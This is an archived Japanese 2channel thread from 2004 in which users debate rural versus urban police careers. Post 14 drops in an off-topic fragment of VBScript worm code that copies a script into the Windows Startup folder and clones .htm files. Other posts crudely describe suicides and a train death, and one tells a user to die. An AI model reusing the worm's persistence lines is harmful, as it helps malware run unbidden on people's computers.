2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【田舎か?】警察就職前線【都市か?】

1 :名無しピーポ君:04/05/30 22:01
出身地(田舎の県)と大学生活を送った街(東京または政令指定都市のある道府県)。

どちらが警察官として充実した生活を送れるものなのでしょうか?

仕事面、金銭面、理念面、遊び面・・・様々な面でそれぞれの利点があると
思いますので、皆さんが思うところを聞かせていただければ幸いです。

2 :名無しピーポ君:04/05/30 22:12
田舎は楽。

マルソウもちらほらしか見かけないし。

3 :名無しピーポ君:04/05/30 22:12
2

4 :名無しピーポ君:04/05/31 01:41
          . | |
       /ヽ   |;,.|
      /  ヽ、,|;;;|、,,.,;!, 、
.     ,/     ";゙ '゙;`'\ 
    /  ○  _   ○   ゙i
    l  u゚ i´`i  υ * ,!     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     !  。  !;,,。!  ゚o  ノ`i   <  もうだめぽ
     \  `";`;  ,,./  l    \___________
      ! ``ー--ー"´    |
      |   ゙i ' ;、 i   ,/ ノ
      |   ,! ;  l   ,! i'
      !、 ノ "・,  ヾ、_ノ, |
       `´l ' ゙ ; ,.   l
        |; .       ;i
        ノ  、;;.,' ,  |
        l  ゙l゙;'|ゞ;   ゙i
        !,  ';|'';|''i; ,'   |
        ヾ、_ノ;:'|;ヾ、  ノ
          |',.| '、| `i´
          |j |.ノ ノ



5 :名無しピーポ君:04/05/31 01:43
地元でのんびりの方がいいんじゃないの?

仕事は都市部より少ないと思われ。

6 :名無しピーポ君:04/05/31 01:49
逆に、出世したいヤシは都市部の方がいいとかあったりして。

田舎だと英語使えても意味とかなさそうだし。

7 :名無しピーポ君:04/05/31 02:01
>>6
キサマ、英語使いか?

それなら上手くやれば外務に出向して海外勤務できるぞ。
早めに警部補になっとけ。

8 :名無しピーポ君:04/05/31 02:04
基本はやっぱり警視庁の刑事だRO!

機動刑事やら特警・特捜・特救指令を見て育った漏れにはそれしかない。

9 :名無しピーポ君:04/05/31 02:10
今日若い男女が山のすそで手をロープで縛り
首を吊ってるのを発見し警察に通報しますた・・・
鑑識が写真とってオレ2時間近く事情聴取されますたガーン

10 :名無しピーポ君:04/05/31 02:11
>>8
アニヲタうざい。

>>9
スレ違い。氏ね。

11 :名無しピーポ君:04/05/31 02:15
>>7
それって地方の県警でも通用するハナシ?

12 :名無しピーポ君:04/05/31 02:17
うーん この前も女子中学生笑いながら電車に引かれた
頭だけ遠くまで引っ張られたらしいけど

13 :名無しピーポ君:04/05/31 02:18
>>10
一応突っ込んどくと、アニメじゃねえ。

で、キティは蟲汁。

14 :名無しピーポ君:04/05/31 19:59
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

15 :名無しピーポ君:04/06/07 00:09
つか、地方が楽と思っていると後で後悔するよ。
警視庁から田舎県警に再就職したんだけど、正直警視庁に戻りたい。
給料は安いし、警視庁以上に署長様が崇められてる。
非番、休みはないし、警視庁なら簡易でやっていた書類が基本……。
人も田舎はいないから、何かあったらすぐにかり出される。

正直、テレビで見るような警察の仕事したければ大規模警察に就職した方が
いいよ。

16 :名無しピーポ君:04/06/07 17:40
>15
大規模警察って、政令指定都市とかがあるとこ?

それとも東京・大阪限定?
京都とか愛知とかもでかそうだが。

4 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)